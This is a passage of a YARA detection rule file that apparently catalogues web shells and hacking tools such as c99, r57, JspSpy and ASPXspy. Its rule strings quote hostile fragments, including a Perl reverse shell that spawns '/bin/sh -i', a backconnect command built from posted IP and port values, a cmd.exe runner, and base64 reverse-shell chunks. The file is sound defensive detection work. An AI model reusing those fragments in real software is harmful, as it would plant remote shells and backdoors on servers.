   		hash = "b815611cc39f17f05a73444d699341d4"   
   	strings:   
   		$s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword   
   	condition:   
   		all of them   
rule FSO_s_cmd {   
   	meta:   
   		description = "Webshells Auto-generated - file cmd.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "cbe8e365d41dd3cd8e462ca434cf385f"   
   	strings:   
   		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"   
   		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"   
   	condition:   
   		all of them   
rule webshell_asp_EFSO_2 {   
   	meta:   
   		description = "Web Shell - file EFSO_2.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "a341270f9ebd01320a7490c12cb2e64c"   
   	strings:   
   		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"   
   	condition:   
   		all of them   
rule webshell_Safe_mode_breaker {   
   	meta:   
   		description = "Web Shell - file Safe mode breaker.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "5bd07ccb1111950a5b47327946bfa194"   
   	strings:   
   		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("   
   		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."   
   	condition:   
   		1 of them   
rule WebShell_ru24_post_sh {   
   	meta:   
   		description = "PHP Webshells Github Archive - file ru24_post_sh.php"   
   		author = "Florian Roth"   
   		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"   
   	strings:   
   		$s1 = "http://www.ru24-team.net" fullword   
   		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"   
   		$s6 = "Ru24PostWebShell"   
   		$s7 = "Writed by DreAmeRz" fullword   
   		$s9 = "$function=passthru; // system, exec, cmd" fullword   
   	condition:   
   		1 of them   
rule PasswordReminder {   
   	meta:   
   		description = "Webshells Auto-generated - file PasswordReminder.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"   
   	strings:   
   		$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."   
   	condition:   
   		all of them   
rule BIN_Server {   
   	meta:   
   		description = "Webshells Auto-generated - file Server.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"   
   	strings:   
   		$s0 = "configserver"   
   		$s1 = "GetLogicalDrives"   
   		$s2 = "WinExec"   
   		$s4 = "fxftest"   
   		$s5 = "upfileok"   
   		$s7 = "upfileer"   
   	condition:   
   		all of them   
rule Webshell_Backdoor_PHP_Agent_r57_mod_bizzz_shell_r57 {   
   	meta:   
   		description = "Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ..."   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"   
   		hash2 = "f51a5c5775d9cca0b137ddb28ff3831f4f394b7af6f6a868797b0df3dcdb01ba"   
   		hash3 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"   
   		hash4 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"   
   		hash5 = "6dc417db9e07420a618d44217932ca8baf3541c08d5e68281e1be10af4280e4a"   
   		hash6 = "5d07fdfee2dc6d81da26f05028f79badd10dec066909932129d398627b2f4e94"   
   		hash7 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"   
   		hash8 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"   
   		hash9 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"   
   		hash10 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"   
   		hash11 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"   
   	strings:   
   		$s1 = "$_POST['cmd'] = which('" ascii   
   		$s2 = "$blah = ex(" fullword ascii   
   	condition:   
   		filesize < 600KB and all of them   
rule webshell_shell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {   
   	meta:   
   		description = "Web Shell - from files shell.php, 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 60   
   		super_rule = 1   
   		hash0 = "791708057d8b429d91357d38edf43cc0"   
   		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"   
   		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"   
   		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"   
   		hash4 = "40a1f840111996ff7200d18968e42cfe"   
   		hash5 = "e0202adff532b28ef1ba206cf95962f2"   
   		hash6 = "802f5cae46d394b297482fd0c27cb2fc"   
   	strings:   
   		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword   
   		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword   
   		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword   
   		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword   
   		$fn = "filename: backup"   
   	condition:   
   		2 of ($s*) and not $fn   
rule mysql_shell_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file mysql_shell.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "d42aec2891214cace99b3eb9f3e21a63"   
   	strings:   
   		$s0 = "SooMin Kim"   
   		$s1 = "smkim@popeye.snu.ac.kr"   
   		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"   
   	condition:   
   		1 of them   
rule webshell_cpg_143_incl_xpl {   
   	meta:   
   		description = "Web Shell - file cpg_143_incl_xpl.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "5937b131b67d8e0afdbd589251a5e176"   
   	strings:   
   		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"   
   		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"   
   	condition:   
   		1 of them   
rule installer {   
   	meta:   
   		description = "Webshells Auto-generated - file installer.cmd"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "a507919ae701cf7e42fa441d3ad95f8f"   
   	strings:   
   		$s0 = "Restore Old Vanquish"   
   		$s4 = "ReInstall Vanquish"   
   	condition:   
   		all of them   
rule WebShell_ftpsearch {   
   	meta:   
   		description = "PHP Webshells Github Archive - file ftpsearch.php"   
   		author = "Florian Roth"   
   		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"   
   	strings:   
   		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword   
   		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword   
   		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword   
   		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword   
   	condition:   
   		2 of them   
rule Pastebin_Webshell {   
   	meta:   
   		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"   
   		author = "Florian Roth"   
   		score = 70   
   		date = "13.01.2015"   
   		reference = "http://goo.gl/7dbyZs"   
   	strings:   
   		$s0 = "file_get_contents(\"http://pastebin.com" ascii   
   		$s1 = "xcurl('http://pastebin.com/download.php" ascii   
   		$s2 = "xcurl('http://pastebin.com/raw.php" ascii   
      
   		$x0 = "if($content){unlink('evex.php');" ascii   
   		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii   
      
   		$y0 = "file_put_contents($pth" ascii   
   		$y1 = "echo \"<login_ok>" ascii   
   		$y2 = "str_replace('* @package Wordpress',$temp" ascii   
   	condition:   
   		1 of ($s*) or all of ($x*) or all of ($y*)   
rule HYTop_DevPack_fso {   
   	meta:   
   		description = "Webshells Auto-generated - file fso.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b37f3cde1a08890bd822a182c3a881f6"   
   	strings:   
   		$s0 = "<!-- PageFSO Below -->"   
   		$s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"   
   	condition:   
   		all of them   
rule ASPXspy2 {   
   	meta:   
   		description = "Web shell - file ASPXspy2.aspx"   
   		author = "Florian Roth"   
   		reference = "not set"   
   		date = "2015/01/24"   
   		hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"   
   	strings:   
   		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii   
   		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii   
   		$s3 = "Process[] p=Process.GetProcesses();" fullword ascii   
   		$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii   
   		$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii   
   		$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii   
   		$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii   
   		$s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii   
   		$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii   
   		$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii   
   		$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii   
   		$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii   
   		$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii   
   		$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii   
   	condition:   
   		6 of them   
rule xssshell_db {   
   	meta:   
   		description = "Webshells Auto-generated - file db.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "cb62e2ec40addd4b9930a9e270f5b318"   
   	strings:   
   		$s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"   
   	condition:   
   		all of them   
rule webshell_jsp_web {   
   	meta:   
   		description = "Web Shell - file web.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "4bc11e28f5dccd0c45a37f2b541b2e98"   
   	strings:   
   		$s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."   
   	condition:   
   		all of them   
rule csh_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file csh.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "194a9d3f3eac8bc56d9a7c55c016af96"   
   	strings:   
   		$s0 = ".::[c0derz]::. web-shell"   
   		$s1 = "http://c0derz.org.ua"   
   		$s2 = "vint21h@c0derz.org.ua"   
   		$s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"   
   	condition:   
   		1 of them   
rule Webshell_27_9_acid_c99_locus7s {   
   	meta:   
   		description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"   
   		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"   
   		hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"   
   		hash4 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"   
   		hash5 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"   
   		hash6 = "5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3"   
   		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"   
   		hash8 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"   
   	strings:   
   		$s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii   
   		$s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii   
   	condition:   
   		filesize < 1711KB and 1 of them   
rule DllInjection {   
   	meta:   
   		description = "Webshells Auto-generated - file DllInjection.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "a7b92283a5102886ab8aee2bc5c8d718"   
   	strings:   
   		$s0 = "\\BDoor\\DllInjecti"   
   	condition:   
   		all of them   
rule webshell_in_JFolder_jfolder01_jsp_leo_warn {   
   	meta:   
   		description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "793b3d0a740dbf355df3e6f68b8217a4"   
   		hash1 = "8979594423b68489024447474d113894"   
   		hash2 = "ec482fc969d182e5440521c913bab9bd"   
   		hash3 = "f98d2b33cd777e160d1489afed96de39"   
   		hash4 = "4b4c12b3002fad88ca6346a873855209"   
   		hash5 = "e9a5280f77537e23da2545306f6a19ad"   
   	strings:   
   		$s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"   
   		$s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"   
   	condition:   
   		all of them   
rule screencap {   
   	meta:   
   		description = "Webshells Auto-generated - file screencap.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "51139091dea7a9418a50f2712ea72aa6"   
   	strings:   
   		$s0 = "GetDIBColorTable"   
   		$s1 = "Screen.bmp"   
   		$s2 = "CreateDCA"   
   	condition:   
   		all of them   
rule Simple_PHP_BackDooR {   
   	meta:   
   		description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "a401132363eecc3a1040774bec9cb24f"   
   	strings:   
   		$s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"   
   		$s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"   
   		$s9 = "// a simple php backdoor"   
   	condition:   
   		1 of them   
rule webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx {   
   	meta:   
   		description = "Web Shell - from files c99.php, Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99shell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"   
   		hash1 = "f2fa878de03732fbf5c86d656467ff50"   
   		hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"   
   		hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"   
   		hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"   
   		hash5 = "048ccc01b873b40d57ce25a4c56ea717"   
   	strings:   
   		$s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""   
   	condition:   
   		all of them   
rule webshell_phpshell_2_1_config {   
   	meta:   
   		description = "Web Shell - file config.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "bd83144a649c5cc21ac41b505a36a8f3"   
   	strings:   
   		$s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword   
   	condition:   
   		all of them   
rule Reader_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file Reader.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "ad1a362e0a24c4475335e3e891a01731"   
   	strings:   
   		$s1 = "Mehdi & HolyDemon"   
   		$s2 = "www.infilak."   
   		$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"   
   	condition:   
   		2 of them   
rule Mithril_v1_45_dllTest {   
   	meta:   
   		description = "Webshells Auto-generated - file dllTest.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "1b9e518aaa62b15079ff6edb412b21e9"   
   	strings:   
   		$s3 = "syspath"   
   		$s4 = "\\Mithril"   
   		$s5 = "--list the services in the computer"   
   	condition:   
   		all of them   
rule Mithril_Mithril {   
   	meta:   
   		description = "Webshells Auto-generated - file Mithril.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "017191562d72ab0ca551eb89256650bd"   
   	strings:   
   		$s0 = "OpenProcess error!"   
   		$s1 = "WriteProcessMemory error!"   
   		$s4 = "GetProcAddress error!"   
   		$s5 = "HHt`HHt\\"   
   		$s6 = "Cmaudi0"   
   		$s7 = "CreateRemoteThread error!"   
   		$s8 = "Kernel32"   
   		$s9 = "VirtualAllocEx error!"   
   	condition:   
   		all of them   
rule r57shell_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file r57shell.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "d28445de424594a5f14d0fe2a7c4e94f"   
   	strings:   
   		$s0 = "r57shell" fullword   
   		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "   
   		$s2 = "RusH security team"   
   		$s3 = "'ru_text12' => 'back-connect"   
   	condition:   
   		1 of them   
rule c99shell {   
   	meta:   
   		description = "Webshells Auto-generated - file c99shell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "90b86a9c63e2cd346fe07cea23fbfc56"   
   	strings:   
   		$s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"   
   	condition:   
   		all of them   
rule xssshell_default {   
   	meta:   
   		description = "Webshells Auto-generated - file default.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "d156782ae5e0b3724de3227b42fcaf2f"   
   	strings:   
   		$s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"   
   	condition:   
   		all of them   
rule r57shell {   
   	meta:   
   		description = "Webshells Auto-generated - file r57shell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "8023394542cddf8aee5dec6072ed02b5"   
   	strings:   
   		$s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"   
   	condition:   
   		all of them   
rule HYTop_DevPack_2005Red {   
   	meta:   
   		description = "Webshells Auto-generated - file 2005Red.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "d8ccda2214b3f6eabd4502a050eb8fe8"   
   	strings:   
   		$s0 = "scrollbar-darkshadow-color:#FF9DBB;"   
   		$s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"   
   		$s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"   
   	condition:   
   		all of them   
rule webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend {   
   	meta:   
   		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"   
   		hash1 = "059058a27a7b0059e2c2f007ad4675ef"   
   		hash2 = "8b457934da3821ba58b06a113e0d53d9"   
   		hash3 = "d44df8b1543b837e57cc8f25a0a68d92"   
   		hash4 = "e0354099bee243702eb11df8d0e046df"   
   		hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"   
   		hash6 = "655722eaa6c646437c8ae93daac46ae0"   
   		hash7 = "591ca89a25f06cf01e4345f98a22845c"   
   	strings:   
   		$s0 = "return new Double(format.format(value)).doubleValue();" fullword   
   		$s5 = "File tempF = new File(savePath);" fullword   
   		$s9 = "if (tempF.isDirectory()) {" fullword   
   	condition:   
   		2 of them   
rule webshell_shell_phpspy_2006_arabicspy {   
   	meta:   
   		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "791708057d8b429d91357d38edf43cc0"   
   		hash1 = "40a1f840111996ff7200d18968e42cfe"   
   		hash2 = "e0202adff532b28ef1ba206cf95962f2"   
   	strings:   
   		$s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"   
   		$s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"   
   	condition:   
   		all of them   
rule nstview_nstview {   
   	meta:   
   		description = "Webshells Auto-generated - file nstview.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "3871888a0c1ac4270104918231029a56"   
   	strings:   
   		$s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"   
   	condition:   
   		all of them   
rule webshell_jsp_inback3 {   
   	meta:   
   		description = "Web Shell - file inback3.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "ea5612492780a26b8aa7e5cedd9b8f4e"   
   	strings:   
   		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"   
   	condition:   
   		all of them   
rule webshell_jsp_k81 {   
   	meta:   
   		description = "Web Shell - file k81.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "41efc5c71b6885add9c1d516371bd6af"   
   	strings:   
   		$s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword   
   		$s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword   
   	condition:   
   		1 of them   
rule WebShell_Generic_PHP_11 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"   
   		hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"   
   		hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"   
   		hash3 = "80aba3348434c66ac471daab949871ab16c50042"   
   	strings:   
   		$s5 = "$filename = $backupstring.\"$filename\";" fullword   
   		$s6 = "while ($file = readdir($folder)) {" fullword   
   		$s7 = "if($file != \".\" && $file != \"..\")" fullword   
   		$s9 = "$backupstring = \"copy_of_\";" fullword   
   		$s10 = "if( file_exists($file_name))" fullword   
   		$s13 = "global $file_name, $filename;" fullword   
   		$s16 = "copy($file,\"$filename\");" fullword   
   		$s18 = "<td width=\"49%\" height=\"142\">" fullword   
   	condition:   
   		all of them   
rule WebShell_GFS {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"   
   		hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"   
   		hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"   
   	strings:   
   		$s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword   
   		$s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword   
   		$s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"   
   	condition:   
   		all of them   
rule webshell_ghost_source_icesword_silic {   
   	meta:   
   		description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"   
   		hash1 = "6e20b41c040efb453d57780025a292ae"   
   		hash2 = "437d30c94f8eef92dc2f064de4998695"   
   	strings:   
   		$s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"   
   		$s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["   
   	condition:   
   		all of them   
rule webshell_config_myxx_zend {   
   	meta:   
   		description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "d44df8b1543b837e57cc8f25a0a68d92"   
   		hash1 = "e0354099bee243702eb11df8d0e046df"   
   		hash2 = "591ca89a25f06cf01e4345f98a22845c"   
   	strings:   
   		$s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"   
   	condition:   
   		all of them   
rule php_anuna   
   {   
       meta:   
           author      = "Vlad https://github.com/vlad-s"   
           date        = "2016/07/18"   
           description = "Catches a PHP Trojan"   
       strings:   
           $a = /<\?php \$[a-z]+ = '/   
           $b = /\$[a-z]+=explode\(chr\(\([0-9]+[-+][0-9]+\)\)/   
           $c = /\$[a-z]+=\([0-9]+[-+][0-9]+\)/   
           $d = /if \(!function_exists\('[a-z]+'\)\)/   
       condition:   
           all of them   
rule webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx {   
   	meta:   
   		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"   
   		hash1 = "059058a27a7b0059e2c2f007ad4675ef"   
   		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"   
   		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"   
   		hash4 = "8b457934da3821ba58b06a113e0d53d9"   
   		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"   
   		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"   
   		hash7 = "14e9688c86b454ed48171a9d4f48ace8"   
   		hash8 = "b330a6c2d49124ef0729539761d6ef0b"   
   		hash9 = "d71716df5042880ef84427acee8b121e"   
   		hash10 = "341298482cf90febebb8616426080d1d"   
   		hash11 = "29aebe333d6332f0ebc2258def94d57e"   
   		hash12 = "42654af68e5d4ea217e6ece5389eb302"   
   		hash13 = "88fc87e7c58249a398efd5ceae636073"   
   		hash14 = "4a812678308475c64132a9b56254edbc"   
   		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"   
   		hash16 = "e0354099bee243702eb11df8d0e046df"   
   		hash17 = "344f9073576a066142b2023629539ebd"   
   		hash18 = "32dea47d9c13f9000c4c807561341bee"   
   		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"   
   		hash20 = "655722eaa6c646437c8ae93daac46ae0"   
   		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"   
   		hash22 = "9c94637f76e68487fa33f7b0030dd932"   
   		hash23 = "6acc82544be056580c3a1caaa4999956"   
   		hash24 = "6aa32a6392840e161a018f3907a86968"   
   		hash25 = "591ca89a25f06cf01e4345f98a22845c"   
   		hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"   
   		hash27 = "3ea688e3439a1f56b16694667938316d"   
   		hash28 = "ab77e4d1006259d7cbc15884416ca88c"   
   		hash29 = "71097537a91fac6b01f46f66ee2d7749"   
   		hash30 = "2434a7a07cb47ce25b41d30bc291cacc"   
   		hash31 = "7a4b090619ecce6f7bd838fe5c58554b"   
   	strings:   
   		$s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword   
   		$s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword   
   	condition:   
   		all of them   
rule webshell_cmd_asp_5_1 {   
   	meta:   
   		description = "Web Shell - file cmd-asp-5.1.asp"   
